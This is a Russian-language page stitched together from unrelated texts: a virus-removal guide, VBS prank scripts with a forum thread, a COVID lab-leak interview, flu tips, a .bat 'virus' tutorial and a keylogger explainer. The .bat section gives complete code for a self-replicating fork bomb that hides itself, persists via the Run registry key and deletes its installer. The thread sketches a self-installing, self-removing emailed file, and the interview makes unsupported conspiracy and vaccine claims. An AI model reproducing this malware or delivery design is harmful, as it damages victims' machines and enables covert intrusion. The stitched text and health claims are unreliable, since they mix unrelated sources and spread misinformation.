Что сделать чтобы вирус не создавал
Неприятное ощущение, когда вы узнали, что ваш компьютер или ноутбук заражен вирусом, ведь на жестком диске могут быть важные файлы, незаменимые фотографии или какой-то незавершенный проект, который вы забыли сохранить. Вирусы и вредоносные программы могут представлять собой значительную угрозу вашим данным и вашей персональной информации, а также могут негативно влиять на работу вашего компьютера.
Существует множество причин, почему ваш компьютер может начать работать медленно, но одна из причин – это наличие вредоносных программ, а потому в первую очередь необходимо обратить внимание на это. Т.к. избавиться от вирусов порой бывает достаточно сложно, то мы подготовили для вас пошаговое руководство от начала и до конца о том, как избавиться от вирусов.
Обнаружение вируса
Прежде чем углубиться в процесс очистки вашего компьютера, важно убедиться в том, есть ли у вас вирус или нет. Вот несколько явных признаков того, что компьютер может быть заражен вирусом:
Метод 1: Сканирование
Перед началом процесса удаления вирусов, проверьте, чтобы у вас были сделаны резервные копии всех ваших самых важных файлов. Это гарантирует вам, что все ценные файлы будут в безопасности, после чего можно будет начинать процесс очистки компьютера. Самое лучшее – это просканировать все ваши персональные данные перед тем, как вы скопируете их на какой-нибудь внешний жесткий диск. Существует множество программ для удаления шпионов/вирусов/вредоносных программ, причем большинство из них – бесплатные. Например, два бесплатных сканера для лечения вашего ПК всего за пару шагов: Panda Cloud Cleaner и Panda Cloud Cleaner для аварийного USB, которые мы обсудим чуть ниже.
После завершения сканирования вы получите сводную информацию о найденных вредоносных программах. Проверьте список обнаружений, чтобы случайно не удалить легитимные программы и быть уверенным в том, что были удалены именно вредоносные программы. Затем перезагрузите ПК и проверьте его работу и быстродействие. Попробуйте открыть браузер или любую другую программу, с которой у вас ранее были проблемы. Если ваш компьютер стал работать хорошо, значит, скорее всего, он теперь свободен от вирусов.
Метод 2: Аварийный диск/USB
Если ваш компьютер не может запуститься в результате вируса, то вам необходимо использовать аварийный диск или USB. Аварийный USB позволяет вам сканировать компьютер без необходимости запуска его системы. Используя другой компьютер, скачайте ISO-образ файлов, предоставляемых вашей антивирусной компанией, и запишите их на диск или USB.
Метод 3: Ручное удаление вируса
Некоторые вирусы могут быть удалены только вручную. Но делать это можно только в том случае, если вы хорошо знаете Windows и знаете, как просматривать и удалять программные файлы. Если вы чувствуете себя вполне уверенно, то скачайте AutoRuns, который позволяет вам точно увидеть, что именно работает на вашем компьютере и как можно от этого избавиться. После того, как вы загрузили AutoRuns, проверьте, что он находится в удобном месте (папке), куда вы сможете быстро обратиться позже при необходимости.
Запустите программу и помните, что есть множество моментов, которые могут быть незнакомы. Чтобы упростить процесс, отключите отчетность о некоторых подписанных службах Microsoft и программах, о которых вы точно знаете, что они не являются вредоносными. Отфильтруйте параметры, чтобы проверять подписи кода, включите пустые локации и скройте записи Microsoft.
Затем перезагрузите ПК в безопасном режиме с поддержкой сети. Это позволит вам использовать Интернет для поиска этих подозрительных программ, которые загружаются вместе с вашим компьютером. Запустите программу AutoRuns и начните поиск подозрительных объектов.
Это может занять много ресурсов и времени, но это важно для поиска вирусов. Обращайте внимание на название файлов и их местоположение, проверяйте легитимность названия с помощью его поиска в Интернете идентификатора процесса, который может помочь вам понять, что за процесс и является ли он потенциальной угрозой. Проверьте вкладки входа в систему и службы, где будет представлена отфильтрованная для вас информация. Также для тщательного анализа потратьте еще время, чтобы пройтись по этим процессам.
Если можете, записывайте местоположение файлов и любой другой соответствующей информации перед тем, как удалять ее. Нажмите правой кнопкой на вредоносной программе и удалите ее. Удалите все связанные файлы, причем удаляйте по одному объекту за раз для обеспечения безопасности. После того как вы удалите вредоносные программы и файлы, проверьте, что ваша корзина на рабочем столе пуста и снова перезагрузите ваш компьютер.
Удаление вируса с Mac
Чтобы предотвратить вирус, загрузите безопасную антивирусную систему на ваш компьютер, если таковой еще у вас нет. Обновляйте ваши программы так часто, как вы можете это делать, т.к. вирусы постоянно меняются и обновляются, чтобы перехитрить вашу систему. Кроме того, регулярно делайте резервную копию ваших данных, чтобы исключить потерю важных файлов, даже если система будет заражена вирусом. Будьте осторожны с электронными письмами, которые вы получаете, и не открывайте подозрительные письма, ссылки или файлы.
Удаление вирусов из Android Phone
Если вы думаете, что ваш смартфон с Android был заражен вирусом, при проверке этого можно использовать те же самые правила. Если наблюдается всплеск обращения к данным, появились нежелательные приложения или внезапные всплывающие окна, то у вас может быть вирус. Если вы стали замечать, что заряд вашего телефона стал быстро исчезать, то это также может быть связано с вирусом (хотя и не всегда). Существует несколько шагов для удаления вирусов с телефона на базе Android.
Вы можете удалить вирус, запустив ваш телефон или планшет в безопасном режиме. Это предотвратит запуск сторонних приложений, включая и вредоносные программы. Нажмите кнопку питания для доступа к опциям выключения питания, а затем нажмите кнопку для перезагрузки в безопасном режиме. После загрузки в безопасном режиме вы можете открывать Настройки и выбрать Приложения или Менеджер приложений.
Теперь у вас будет возможность вернуться в меню приложений и удалить требуемые приложения. Теперь, после удаления вируса, перезагрузите ваше устройство и выключите безопасный режим. После удаления вируса обязательно сделайте резервные копии важных файлов с вашего устройства и установите антивирус для Android, чтобы избежать проблем в будущем.
Здравствуйте! В этом посте (первом) я покажу, как создавать вирус шутку через блокнот. Сразу прошу не бомбить и не писать гневные комменты типа: "Да такого миллион!", "Да что ты знаешь!", "Да пошел ты в жопу!" и т.д. Да, я знаю, что эти "вирусы" создавали давно. Но я к примеру открыл для себя это совсем недавно. Месяца 3 назад.
Ближе к делу: я буду рассказывать что эта шутка вообще делает, буду вставлять скрины и все объяснять. Напомню, это ознакомительный пост! В других постах я буду конкретно писать, как создать такой-то вирус.
Вирус-шутка это программа, которую создают в блокноте. Т.е. пишешь там команды и сохраняешь их определенных форматах. Если все правильно сделано, без ошибок, то вирус-шутка сработает. Кстати, "вирус-шутка" это условное название. В блокноте можно создать и игру, и крестики нолики, часы.
ПРЕДУПРЕЖДЕНИЕ. Перед созданием вируса отключите Анти-Вирус.
1) Создание вируса: Для начала откройте блокнот.
2) В блокноте начинайте писать команду. Для начала скопируйте этот текст туда:
msgbox"Ты не против, если я буду жить у тебя в компе?",32+4,"Вопрос"
msgbox"Ок, ты не против",64,"Я понял"
msgbox"Ок, ты не против",64,"Я понял"
msgbox"Это шутка, это НЕ вирус :) ХАХАХАХА",64,"Я пошутил"
msgbox"Или же нет. ",64,". "
Я НЕ ЖЕЛАЮ ВАМ ЗЛА! ЭТОТ ВИРУС НЕ МОЖЕТ ПРИНЕСТИ ВАМ И ВАШЕМУ КОМПУ ВРЕДА!
3) Сохраните ваш текст в формате .vbs Смотрите далее.
4) Теперь у вас на Рабочем столе должен появиться вот такой значок:
5) Заходите в него.
6) У вас должен открыться вирус-шутка. Если же не работает, то два варианта: либо у вас включен Анти-Вирус, либо ваш комп не поддерживает это.
7) НЕ ПУГАЙТЕСЬ! ВИРУС-ШУТКА НЕ ПРИНЕСЕТ ВРЕДА. Теперь вам осталось читать то, что там написано, и кликать по кнопкам (любым).
Вы можете изменить в команде вируса текст. Например вместо "Windows удалить?" можно написать "ставьте лайки!". Удачи вам, экспериментируйте со своими вирусами!
И так, как я обещал, это был ознакомительный пост. Вскоре я выложу пост, где подробно опишу все значения, как все делать и т.д. Отпишитесь в тапках как вам мой пост, киньте скрины своего вируса. Мне будет интересно :D
сука! у меня винда удалилась!
Не ври. Этот вирус-шутка и близко такого сделать не может.
ТС, у вас тоже снегопад? Занятия в школах отменили?
Да, отменили. Вот и сижу, "клавотюкаюсь".
Мне хочется узнать все подробно как это работает что обозначает msgbox, цифры 64; 32+4
"msgbox" - название команды, которая выводит стандартный диалог. Цифрами выбирается стиль отображения (иконка внутри диалога и воспроизводимый звук при открытии). Также стилем выбираются кнопки (их текст и количество)
Отображаемых иконок всего 4: ошибка, вопрос, восклицание и внимание. Столько-же звуков.
Кнопок в связке по более:
Ок
Ок, Отмена
Да, Нет
Да, Нет, Отмена
Повтор, Отмена
Пропустить, Повторить Отменить
Т.к. эти диалоги выдаются системой, то можно указать только заголовок и текст диалога. Свой текст кнопок или свою иконку Вы не сможете установить. Можно вывести диалог без иконки. Вроде ничего не забыл. Давно увлекался этим, потом перешел на норм. язык программирования.
Ой, а может поможете раз разбираетесь?
Хочу коллегу разыграть/ поздравить с днем рождения. Он в командировке сейчас. Хочу ему на почту файл бросить который в определенный день ему на принтер выведет поздравление. Как можно батник сделать, чтобы он себя в автозагрузку прописал и именно в определенный день сработал? Ну и удалился потом, чтоб он не догадался.
В инете поискал, там только на удаление доков батники) и определенного дня нельзя поставить.
Если хотите именно батник, то можно попробовать использовать планировщик Windows, но с батниками куча ограничений.
О поздравлялке: даже если Вы отправите эл. письмо с батником или exe-шником, то поздравление не сработает, пока его не скачают и не запустят. В некоторых случаях почтовый сервис может отправить письмо в папку "Спам" (пользователь его не увидит), либо при скачивании файл заблокирует антивирус, но это все маловероятно.
На счет печати принтером: это можно, но обязательно? Можно например вывести на экран красивый диалог, или картинку :)
Нет с программкой не тот эффект))) Да и вк нету.
Просто хотелось отправить на почту письмо, (его обязательно откроют, так как с этого адреса только по работе приходит, да и с чувством опасности у людей проблемы))), чтоб этот файл прописался в планировщик или в автозагрузку, а в нужный день отправил бы на печать текст. Там принтер ежедневно включают, так что по-любому бы удивил)))
Я батники когда-то давно делал. Даже похожий прикол видел, когда из планировщика каждый день на печать выходит "Ты умрешь через *** дней", "Ты умрешь завтра", "Это случится сегодня". Но там надо было за компом посидеть, чтоб настроить. А как это "дистанционно" через почту сделать я не знаю.
В любом случае спасибо.
Хм, думаю, что через батник хоть и сложно, но реально: батник запускает установщик Windows (msiexec.exe) с параметром, который скачает и установит программу и документ с текстом печати. Программа прописывается в автозапуск и следит за датой и временем системы. Как только дата начала наступает, программа запускает скрытый процесс Microsoft Office Word (winword.exe) с параметром начала печати нашего документа. Программа делает какую-нибудь отметку на каком-либо ресурсе (сайте или сервере), что она успешно отработала. Запускается msiexec.exe с параметром удаления нашей программы (программа удаляется с компьютера).
Несколько вопросов:
- на компьютере есть MS Office Word? Иначе придется создавать документ формата .rtf (поддерживается системой без доп. софта)
- проще изначально в письме использовать не батник, а именно приложение (exe-файл, т.к. не придется сначала создавать, а после скачивать установщик). Если нужно, то предоставлю исходный код приложения. Язык программирования - AutoIt 3. Его синтаксис очень напоминает рассматриваемые в посте скрипты. Так может лучше обойтись без батника?
- нужны дата запуска печати документа и текст поздравления
- желательно заранее знать, какая операционная система установлена на компьютере, где будет выполняться "поздравлялка" (XP, Vista, 7, 8, 8.1, 10 или серверные редакции систем Windows)?
Теорию нобелевского лауреата Монтанье подтвердил профессор Чумаков
вчера в 17:38, просмотров: 73218
Вспомним, о чем говорили Люк Монтанье и Жан-Франсуа Лемуан.
Нобелевский лауреат заявил, что коронавирус, ответственный за пандемию, был, скорее всего, искусственно создан в поисках вакцины против СПИДа, но случайно выпущен из китайской лаборатории в Ухане. По мнению Монтанье, это могло произойти в течение последней трети 2019 года.
Нобелевского лауреата, который когда-то преуспел в расшифровке генома ВИЧ, очень заинтересовал коронавирус, вызвавший пандемию. Он решил познакомиться с ним поближе, пригласив в помощники математика Жана-Клода Переза – специалиста в вычислительной биологии.
Природа сама рано или поздно убьет COVID-19, но можно ей помочь
По мнению ученого, даже если мы ничего не будем делать, в итоге все придет в норму. Но эта нормализация обернется многочисленными смертями "Мы можем ускорить процесс возвращения к норме, используя принцип РНК-интерференции, уничтожая последовательность РНК этого вируса, даже если человек уже заражен", - сказал Монтанье.
Высказать свое мнение по поводу выступления Люка Монтанье, мы попросили профессора, члена-корреспондента РАН, главного научного сотрудника Института молекулярной биологии им. В.А. Энгельгардта РАН, сотрудника ФНЦ исследований и разработки иммунобиологических препаратов им. М. П. Чумакова. Петра Чумакова.
– В Китае ученые Уханьской лаборатории на протяжении более 10 лет активно занимались разработкой различных вариантов коронавируса. Причем они это делали, якобы не с целью создания болезнетворных вариантов, а для изучения их патогенности. Они делали совершенно безумные, на мой взгляд, вещи: к примеру, вставки в геном, которые придавали вирусу способность заражать клетки человека. Сейчас это все было проанализировано. Картина возможного создания нынешнего коронавируса потихоньку вырисовывается.
– Вы изучали последовательность генома SARS-CoV-2? Там действительно есть искусственные вставки?
– Там есть несколько вставок, то есть подмены естественной последовательности генома, которые и придали ему особые свойства. Интересно, что все свои работы китайцы и американцы, которые с ними работали, публиковали в открытой прессе. Я даже удивляюсь, почему эта предыстория очень медленно доходит до людей! Думаю, что все-таки будет инициировано расследование, по результатам которого выработают новые правила, регулирующие работу с геномами таких опасных вирусов.
Так что выводы Монтанье не беспочвенны, за ними стоят очень серьезные подозрения. Сейчас рано кого-то осуждать. Наверняка, варианты вируса создавались без злого умысла, возможно, как говорит Монтанье, в Ухане хотели создать вакцину от ВИЧ. Хотя никто не исключает, что за спиной ученых стояли кураторы, которые направляли действия в другом, нужном им направлении. Ведь известно, что лаборатория частично финансировалась небезызвестным фондом Джорджа Сороса, имеющим неоднозначную репутацию в мире.
– Так как же мог вирус вырваться наружу?
– Кто знает? Может, им инфицировали мышь, а она вырвалась из вивария и улетела. Тут можно сколько угодно сценариев строить.
– Как вы считаете, Китай допустит комиссию по расследованию в Ухань, если такая будет создана?
– Они вынуждены будут допустить. На фоне того, что уже сейчас раздаются голоса со стороны президента США о возможной денежной компенсации за содеянное, в интересах Китая будет доказывать свою непричастность к заражению всего мира коронавирусом. Возможно, во всем обвинят лишь отдельных людей, но не исключено, что среди виновных могут оказаться и американские консультанты.
– Там нет собственно вставок ВИЧ, это похожие на них элементы, которые делают вирус опасным для человека. Когда вирус начинает мутировать, эти вставки становятся не нужны, и вирус их теряет, избавляется от них.
– Почему вирусу не нужны опасные вставки?
– Потому что он не должен убивать. Убийство организма своего хозяина противоречит его природе.
– Как мило. А что же ему нравится?
– Самое лучшее для вируса — это вызывать бессимптомную инфекцию, когда он спокойно может размножаться, переходя от человека к человеку. Поэтому болезнетворный вариант вируса среди людей постепенно утрачивает свою патогенность и превращается в безвредный вариант.
– Нобелевский лауреат вспомнил про такой способ борьбы с опасными вирусами, как РНК-интерференция. Можете пояснить, что это?
– Живую вакцину против полиомиелита?
- Да, как показала практика, она может противостоять короткое время против любых болезнетворных вирусов. Когда мы сталкиваемся с новыми инфекциями, для которых не создано ни лекарств, ни вакцин, это средство можно использовать для защиты определённых групп населения. К примеру, тех, кто стоит на переднем фланге борьбы с вирусом, тех же медиков в больницах.
– А если человек уже заражен, только пока не знает об этом?
– Наши исследования показали, что если симптомы отсутствуют, то полиомиелитная вакцина поможет побороть попавший, но не развившийся новый вирус, и человек не заболеет.
- Почему же тогда этот метод сейчас на применяют?
– Мы боремся за это, пишем письма в Минздрав. Дело в том, что исследования эти проходили так давно, что сегодня и специалистов-то, участвовавших в них, по-видимому кроме меня уже никого не осталось. Сейчас я активно рассылаю нашим чиновникам свои прежние статьи на этот счет.
Как действовать: в транспорте, магазинах, офисах
1. Маски.
Можно использовать одноразовые маски для лица в общественном транспорте и других местах скопления людей. Снимать маску следует сразу же после выхода из транспорта на свежий воздух. На улице они совершенно бесполезны. Помните, что использованную маску необходимо выбросить, даже если срок ее службы составил не более 20 минут.
Маски - действенное средство по профилактике гриппа, но помните о правилах их эффективного применения. Фото: Михаил ФРОЛОВ
2. Моем руки после поручней и тележек.
Будьте бдительны: после прикосновения к источнику инфекции достаточно почесать нос, потереть глаза, съесть что-нибудь немытыми руками, чтобы она попала на слизистые оболочки дыхательных путей и начала развиваться.
Поэтому так важно мыть руки после прихода с улицы. А если нет возможности вымыть — обязательно протирать дезинфицирующими салфетками или лосьонами.
3. Протирайте клавиатуру и мышку.
Чаще всего на работе мы дышим и чихаем на экран компьютера или ноутбука. Не забудьте потом заботливо протереть то, на что начихали. Включая все, что трогаете (мышку и клавиатуру).
ВАЖНО!
* Длительность жизни вируса гриппа на руках человека - не более пятнадцати минут.
* в воздухе помещений он активен от двух до девяти часов,
* на тканях и бумаге вирус гриппа - максимум на двенадцать часов,
* на стеклянных поверхностях — до восьми дней,
* На на металлических и пластиковых предметах – до двух суток.
4. Дышим эфирными маслами.
Даже несколько капель натурального эвкалиптового масла при испарении обладают противовоспалительным, антисептическим и иммуностимулирующими свойствами. Еще к эфирным маслам с противовирусным эффектом относят масла мяты, можжевельника, шалфея, чайного дерева, эвкалипта.
Можно использовать капли или спреи с эфирными маслами (например, брызнуть или капнуть перед выходом на шарф или платок и вдыхать время от времени). С профилактической функцией хорошо справляются и карандаши-ингаляторы.
Прививка против гриппа поможет снизить ваши шансы подхватить эту болезнь. Фото: Олег УКЛАДОВ
Как быть дома
5. Промываем нос.
Если пришлось долго быть в общественных местах, то дома промойте нос солевым раствором – это обеспечит дезинфекцию слизистой носоглотки и снизит риск развития воспалительного процесса.
Можно купить уже готовые наборы для промывания, а можно использовать спринцовку и домашний раствор. Приготовить его просто: для профилактики используется раствор слабой концентрации – в 200 мл горячей воды добавляют по 1 ч. л. пищевой соды и поваренной соли. Раствором можно пользоваться, когда он остывает до комнатной температуры.
Как быстро избавиться от насморка
6. Не забываем про пульты, планшеты и мобильники.
Все, чего мы касаемся руками на улице (ручки у сумок, мобильники, планшеты) нужно обрабатывать в сезон вирусов как можно чаще. Лучше если это будут салфетки или антисептические лосьоны (с содержанием спирта не менее 60%).
Не забывайте протирать также выключатели, дверные ручки, пульты от телевизора, клавиатуру и мышку домашних компьютеров и другие часто используемые предметы в доме.
7. Купите увлажнитель воздуха.
Не стоит забывать и об увлажнении воздуха в помещении — это поможет держать слизистые (наш барьер от вирусов) в тонусе. Обезопасить от микробов и вирусов помещение помогут специальные фотокаталитические очистители. Специально разработанные приборы разрушают микроскопические организмы и эффективно борются с вирусами и бактериями.
КСТАТИ
Простое, но важное: хорошо спим, много пьем и едим зеленые и оранжевые овощи и фрукты
В сезон распространения вирусов наш организм проходит серьезную проверку на стойкость. Неправильное питание, малоподвижный образ жизни, нестабильный сон – все это повышает риск заболевания.
* Поэтому спите максимально долго и правильно (не меньше 8 часов и ложитесь в одно и то же время).
* Больше гуляйте (например, от метро до дома по вечерам).
* Добавьте в рацион больше овощей и фруктов: темно-зеленые, красные и желтые овощи и фрукты, содержащие антиоксиданты, витамины А, С, Е и бета-каротин.
* Не забывайте про индивидуально подобранный питьевой режим, который позволит восполнить дефицит жидкости в организме и увлажнить слизистые. Как известно, вирусы легче проникают в клетки эпителия верхних дыхательных путей, когда они недостаточно увлажнены и на них появляются микротрещины.
Чем лучше питаться в сезон простуды и гриппа
Как создать простой .bat вирус?
Создание самых простых вирусов не требует наличия специальных сред для разработки программ. И особых знаний, кстати, тоже. Создать вирусы довольно просто, если использовать для этого командную строку. Для этого нужно немного знать синтаксис командной строки и уметь создавать .bat-файлы.
Если очень поверхностно, то это файлы с расширением .bat. Такие файлы несут в себе команды, которые должны быть выполнены командным интерпретатором Windows. Все те команды, которые можно выполнить в окне командной строки, можно вписать в .bat-файл и запустить. Результат будет одинаковым.
Чтобы создать .bat-вирус, нам нужен обычный текстовый редактор. В идеале подойдет для этих целей Блокнот. Создав и открыв новый текстовый документ, Вам нужно вписать туда тот код(команды), которые он должен выполнить. После этого, Вам нужно с помощью меню Сохранить как сохранить этот файл, задав ему какое-либо имя с расширением .bat и указав тип файла Все файлы.
В данной статье мы рассмотрим создание вируса, который после своего запуска будет бесконечно открывать окно командной строки. Бесконечно и очень быстро открывающиеся окна командной строки не дадут пользователю спокойно работать. Закрыть их всех не успеет никто и очень скоро они забьют оперативную память компьютера, что в свою очередь сильно затормозит работу компьютера, вплоть до полного зависания. Выглядеть это будет приблизительно так:
Вдобавок, мы закинем наш вирус в автозагрузку, что обеспечит автоматический запуск вируса вместе с операционной системой.
Сколько программистов, столько разных решений можно придумать для каждой задачи. Я приведу один из своих методов решения такой задачи.
[code]md c:\papka
echo start c:\papka\virus.bat>c:\papka\virus.bat
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v virus /d c:\papka\virus.bat
attrib +r +h +s c:\papka
attrib +r +h +s c:\papka\virus.bat
start c:\papka\virus.bat
del %0[/code]
А теперь разберем сам код. Первая строчка создает папку с именем papka в корне диска C:/. Такой адрес приведен только для примера. Использование же корня папки C:/ не совсем хороший вариант для вируса. Если Вы хотите обеспечить хорошую выживаемость Вашему вирусу, лучше всего спрятать его подальше. Первую команду можно даже пропустить, если Вы закинете сам вирус в уже созданную директорию.
Вторая строчка создает файл c:\papka\virus.bat и, с помощью команды echo, вписывает в него команду start c:\papka\virus.bat. Тут нужно знать, что после знака > указывается место вывода приведенной команды. Тут Вам нужно познакомится: c:\papka\virus.bat и есть основное тело вируса. Созданный нами .bat-файл с кодом, который мы сейчас разбираем, является всего лишь установщиком нашего основного вируса. Вы можете использовать другое название и другое местоположение для вируса.
Третья строчка закидывает созданный нами во второй строчке тело вируса в автозагрузку. Для этого используется пользовательская ветка реестра, так как к ней у пользователя всегда есть доступ. А вот использовать автозагрузку компьютера не безопасно, так как пользователь может не иметь административного доступа, что вызовет ненужную ошибку.
Четвертая и пятая строка кода изменяют атрибуты вируса и папки, где хранится вирус. Данными командами, а для этого используется команда attrib, мы добавляем атрибуты Только чтение, Скрытый и Системный и для папки, и для вируса. Использование атрибута r(Только чтение) необязательно. А вот атрибуты Скрытый и Системный хорошо защитят созданный нами вирус. Если не верите, то почитайте статью про вирус, который превращает папки на флешке в ярлыки. Он использует именно эту технологию.
6-ая строчка кода запускает наш вирус. Вы можете пропустить этот пункт, если хотите, чтобы первый запуск вируса произошел только после перезагрузки компьютера.
И, наконец-то, последняя, 7-ая строчка удаляет данный .bat-вирус. Это полезно, так как по этому .bat-файлу можно спокойно выйти на созданный нами вирус и удалить его.
Смысл вируса, который уместился в эти 7 строк — создать основной вирус, защитить его и обеспечить его постоянную работу. А так же подмести свои следы. А что делает основной вирус? После запуска основного вируса, он выполняет ту команду, которая вписана в нее. А это команда, в свою очередь, запускает наш вирус, который опять-таки снова запускает самого себя. И так до бесконечности.
Во-первых, начало борьбы с данным вирусом начнется после того, как он запуститься. Очень скоро вирус заполнит своими копиями оперативную память и Вы даже мышкой шевельнуть не сможете. Поэтому, такой спектакль нужно пресекать сразу. Для этого прекрасно подойдет кнопка Break на клавиатуре. Жмите ее столько, сколько понадобится, чтобы новые копии перестали создаваться. На клавиатурах без кнопки Break, может помочь сочетание клавиш Ctrl+C.
Вы можете найти и удалить вирус через его запись в автозагрузке(подробнее по ссылке). А так же Вы можете выйти на вирус по команде, которая будет высвечиваться в окне командного интерпретатора. Естественно, если Вы сможете добраться до скрытого и системного файла. Вот таким образом происходит создание простого вируса.
Хакерский мир можно условно разделить на три группы атакующих:
Может ли кто-то с хорошими навыками в программировании стать последним? Не думаю, что вы начнете создавать что-то, на подобии regin (ссылка) после посещения нескольких сессий DEFCON. С другой стороны, я считаю, что сотрудник ИБ должен освоить некоторые концепты, на которых строится вредоносное ПО.
Зачем ИБ-персоналу эти сомнительные навыки?
Знай своего врага. Как мы уже обсуждали в блоге Inside Out, нужно думать как нарушитель, чтобы его остановить. Я – специалист по информационной безопасности в Varonis и по моему опыту – вы будете сильнее в этом ремесле если будете понимать, какие ходы будет делать нарушитель. Поэтому я решил начать серию постов о деталях, которые лежат в основе вредоносного ПО и различных семействах хакерских утилит. После того, как вы поймете насколько просто создать не детектируемое ПО, вы, возможно, захотите пересмотреть политики безопасности на вашем предприятии. Теперь более подробно.
Кейлогер – это ПО или некое физическое устройство, которое может перехватывать и запоминать нажатия клавиш на скомпрометированной машине. Это можно представить как цифровую ловушку для каждого нажатия на клавиши клавиатуры.
Зачастую эту функцию внедряют в другое, более сложное ПО, например, троянов (Remote Access Trojans RATS), которые обеспечивают доставку перехваченных данных обратно, к атакующему. Также существуют аппаратные кейлогеры, но они менее распространены, т.к. требуют непосредственного физического доступа к машине.
Тем не менее создать базовые функции кейлогера достаточно легко запрограммировать. ПРЕДУПРЕЖДЕНИЕ. Если вы хотите попробовать что-то из ниже следующего, убедитесь, что у вас есть разрешения, и вы не несёте вреда существующей среде, а лучше всего делать это все на изолированной ВМ. Далее, данный код не будет оптимизирован, я всего лишь покажу вам строки кода, которые могут выполнить поставленную задачу, это не самый элегантный или оптимальный путь. Ну и наконец, я не буду рассказывать как сделать кейлогер стойким к перезагрузкам или пытаться сделать его абсолютно не обнаружимым благодаря особым техникам программирования, так же как и о защите от удаления, даже если его обнаружили.
Для подключения к клавиатуре вам всего лишь нужно использовать 2 строки на C#:
Вы можете изучить больше про фунцию GetAsyncKeyState на MSDN:
Для понимания: эта функция определяет нажата клавиш или отжата в момент вызова и была ли нажата после предыдущего вызова. Теперь постоянно вызываем эту функцию, чтобы получать данные с клавиатуры:
Что здесь происходит? Этот цикл будет опрашивать каждые 100 мс каждую из клавиш для определения ее состояния. Если одна из них нажата (или была нажата), сообщение об этом будет выведено на консоль. В реальной жизни эти данные буферизируются и отправляются злоумышленнику.
Умный кейлогер
Погодите, а есть ли смысл пытаться снимать всю подряд информацию со всех приложений?
Код выше тянет сырой ввод с клавиатуры с любого окна и поля ввода, на котором сейчас фокус. Если ваша цель – номера кредитных карт и пароли, то такой подход не очень эффективен. Для сценариев из реального мира, когда такие кейлогеры выполняются на сотнях или тысячах машин, последующий парсинг данных может стать очень долгим и по итогу потерять смысл, т.к. ценная для взломщика информация может к тому времени устареть.
Вторая версия кода:
Еще более умный кейлогер
Давайте предположим, что злоумышленник смог получить данные кодом, на подобии нашего. Так же предположим, что он достаточно амбициозен и смог заразить десятки или сотни тысяч машин. Результат: огромный файл с гигабайтами текста, в которых нужную информацию еще нужно найти. Самое время познакомиться с регулярными выражениями или regex. Это что-то на подобии мини языка для составления неких шаблонов и сканирования текста на соответствие заданным шаблонам. Вы можете узнать больше здесь.
Для упрощения, я сразу приведу готовые выражения, которые соответствуют именам логина и паролям:
Эти выражения здесь как подсказка тому, что можно сделать используя их. С помощью регулярных выражений можно искать (т найти!) любые конструкции, которые имеют определенный и неизменный формат, например, номера паспортов, кредитных карт, учетные записи и даже пароли.
Действительно, регулярные выражения не самый читаемый вид кода, но они одни из лучших друзей программиста, если есть задачи парсинга текста. В языках Java, C#, JavaScript и других популярных уже есть готовые функции, в которые вы можете передать обычные регулярные выражения.
Для C# это выглядит так:
Где первое выражение (re) будет соответствовать любой электронной почте, а второе (re2) любой цифро буквенной конструкции больше 6 символов.
Бесплатно и полностью не обнаружим
В своем примере я использовал Visual Studio – вы можете использовать свое любимое окружение – для создания такого кейлогера за 30 минут.
Если бы я был реальным злоумышленником, то я бы целился на какую-то реальную цель (банковские сайты, соцсети, тп) и видоизменил код для соответствия этим целям. Конечно, также, я запустил бы фишинговую кампанию с электронными письмами с нашей программой, под видом обычного счета или другого вложения.
Остался один вопрос: действительно такое ПО будет не обнаруживаемым для защитных программ?
В этом основная фишка! Вы всегда можете менять код и развиваться, будучи всегда на несколько шагов раньше сканеров угроз. Если вы в состоянии написать свой собственный код он почти гарантированно будет не обнаружим. На этой странице вы можете ознакомиться с полным анализом.
Основная цель этой статьи – показать, что используя одни только антивирусы вы не сможете полностью обеспечить безопасность на предприятии. Нужен более глубинная оценка действий всех пользователей и даже сервисов, чтобы выявить потенциально вредоносные действия.
В следующих статья я покажу, как сделать действительно не обнаружимую версию такого ПО.
Читайте также: